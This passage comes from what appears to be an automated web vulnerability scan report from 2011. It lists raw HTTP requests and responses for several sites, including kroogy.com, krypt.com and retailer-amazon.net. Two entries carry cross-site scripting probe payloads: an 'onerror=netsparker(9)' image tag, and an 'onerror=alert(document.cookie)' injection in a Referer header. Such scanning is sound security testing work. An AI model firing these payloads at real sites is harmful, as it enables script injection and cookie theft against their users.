X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2261

<table cellpadding="0" cellspacing="0" width="100%"><tr><td nowrap="nowrap"><div id="livesearch_a_1" onclick="javascript:setvaluefortb('src1=\"http:')" ><span style="float:left;">&nbsp;s<strong>rc
...[SNIP]...

32.61. http://kroogy.com/index/livesearch&q=si&type=web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=si&type=web

Request

GET /index/livesearch&q=si&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2332

<table cellpadding="0" cellspacing="0" width="100%"><tr><td nowrap="nowrap"><div id="livesearch_a_1" onclick="javascript:setvaluefortb('simple javascript slideshow.')" ><span style="float:left;">&
...[SNIP]...

32.62. http://kroogy.com/index/livesearch&q=sit&type=web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=sit&type=web

Request

GET /index/livesearch&q=sit&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:27:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4524

<table cellpadding="0" cellspacing="0" width="100%"><tr><td nowrap="nowrap"><div id="livesearch_a_1" onclick="javascript:setvaluefortb('site:viajesaegipto.biz')" ><span style="float:left;">&nbsp;s
...[SNIP]...

32.63. http://kroogy.com/index/livesearch&q=site&type=web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site&type=web

Request

GET /index/livesearch&q=site&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:27:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4528

<table cellpadding="0" cellspacing="0" width="100%"><tr><td nowrap="nowrap"><div id="livesearch_a_1" onclick="javascript:setvaluefortb('site:viajesaegipto.biz')" ><span style="float:left;">&nbsp;s
...[SNIP]...

32.64. http://kroogy.com/index/livesearch&q=site:&type=web  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site:&type=web

Request

GET /index/livesearch&q=site:&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:27:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 4552

<table cellpadding="0" cellspacing="0" width="100%"><tr><td nowrap="nowrap"><div id="livesearch_a_1" onclick="javascript:setvaluefortb('site:viajesaegipto.biz')" ><span style="float:left;">&nbsp;s
...[SNIP]...

32.65. http://kroogy.com/pub/banner_728_90_random.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Request

GET /pub/banner_728_90_random.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.3.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 277

<html>
<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0"><p align=center>
<center><a href="http://www.dictof.com" target="_blank">
<img src="http://k
...[SNIP]...

32.66. http://kroogy.com/search/images/blank.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/images/blank.gif

Request

GET /search/images/blank.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 12:37:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Apr 2011 17:16:02 GMT
ETag: "800514-3bc-4a0f8323c7880"
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
Content-Length: 956

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at kroogy.com
</ADDRESS>
</BODY>
</HTML>
...[SNIP]...

32.67. http://kroogy.com/search/random.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/random.php

Request

GET /search/random.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2080

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.68. http://kroogy.com/search/web/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/index.php

Request

GET /search/web/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; __utmc=221607367; __utmb=221607367.1.10.1303658380

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2113

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.69. http://krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /

Request

GET / HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:32 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=b90b5be3ebc9fd9d15f94d51bc1066e1; expires=Tue, 24-May-2011 16:34:32 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27975

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Dedicate
...[SNIP]...

32.70. http://krypt.com/active/cart/add.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /active/cart/add.html

Request

GET /active/cart/add.html?package=65 HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:37:50 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:37:53 GMT; path=/; domain=.krypt.com
Content-Length: 7
Content-Type: text/html

SUCCESS

32.71. http://krypt.com/dedicated/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /dedicated/

Request

GET /dedicated/ HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:53 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:34:54 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 26049

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Dedicate
...[SNIP]...

32.72. http://krypt.com/go/promos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /go/promos

Request

GET /go/promos HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:53 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:34:54 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 17455

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Promotio
...[SNIP]...

32.73. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1098&ref2=http%3A//www.arcsight.com/products/products-identity/&tzo=360&ms=369 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.arcsight.com/products/products-esm/arcsight-express/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=8EE1D10DCCE142B68BB195EB59D8F5BA; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 19:46:49 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

32.74. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partners.nextadnetwork.com
Path:   /z/371/CD1/id4+106163471

Request

GET /z/371/CD1/id4+106163471 HTTP/1.1
Host: partners.nextadnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:50 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Cache-Control: public, max-age=0, must-revalidate
P3P: policyref="/w3c/p3p.xml", CP="NOR NOI DSP COR ADM OUR PHY"
Set-Cookie: directtrack_click_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Mon, 25-Apr-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/
Set-Cookie: directtrack_lead_nextadvisor=808f2dfdd28836ef0eea9f5f881dcaf8; expires=Tue, 24-May-2011 03:09:50 GMT; path=/; domain=.directtrack.com
X-Server-Name: www@dc1dtweb107
Content-Length: 477
Content-Type: text/html

<html><head><meta http-equiv="refresh" content="0;url=http://affiliate.idgtracker.com/rd/r.php?sid=13&pub=300009&c1=id4 106163471CD1&c2=CD1">
<script type="text/javascript">function redirect() {if(doc
...[SNIP]...

32.75. http://pub.retailer-amazon.net/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /a

Request

GET /a HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_a.php?search={$keyw/a6d4b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E1a348cd60acord}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 16:07:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 225

<html>
<head>
<meta http-equiv="refresh" content="0; URL=http://retailer-amazon.net">
</head>


<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">


...[SNIP]...

32.76. http://pub.retailer-amazon.net/banner_120_600_a.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_a.php

Request

GET /banner_120_600_a.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 436


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0
...[SNIP]...

32.77. http://pub.retailer-amazon.net/banner_120_600_b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_120_600_b.php

Request

GET /banner_120_600_b.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:25:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 655


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
<meta http-equiv="refresh" content="15; URL=banner_120_600_b.php
...[SNIP]...

32.78. http://pub.retailer-amazon.net/banner_728_90_a.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_a.php

Request

GET /banner_728_90_a.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 444


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
</head>

<body topmargin="0" leftmargin="0" rightmargin="0" bottom
...[SNIP]...

32.79. http://pub.retailer-amazon.net/banner_728_90_b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /banner_728_90_b.php

Request

GET /banner_728_90_b.php?search={$keyword} HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_728_90_a.php?search={$keyword}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 662


<html>
<head>
<title> {$keyword} </title>
<meta name="description" content="{$keyword}">
<meta name="keywords" content="{$keyword}">
</head>


<body topmargin="0" leftmargin="0" rightmargin="0" bo
...[SNIP]...

32.80. http://pub.retailer-amazon.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pub.retailer-amazon.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: pub.retailer-amazon.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 16:07:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 225

<html>
<head>
<meta http-equiv="refresh" content="0; URL=http://retailer-amazon.net">
</head>


<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">


...[SNIP]...

32.81. https://secure.krypt.com/cart/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /cart/

Request

GET /cart/ HTTP/1.1
Host: secure.krypt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; cid=9b766d29f4a59d55b1ee0c2aaaa06184; __utmb=218737475.6.10.1303662879;

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 16:55:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:55:30 GMT; path=/; domain=.krypt.com
Connection: close
Content-Type: text/html


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - View Ca
...[SNIP]...

32.82. https://secure.krypt.com/checkout/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /checkout/

Request

GET /checkout/ HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
Referer: https://secure.krypt.com/order/customize.html?index=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
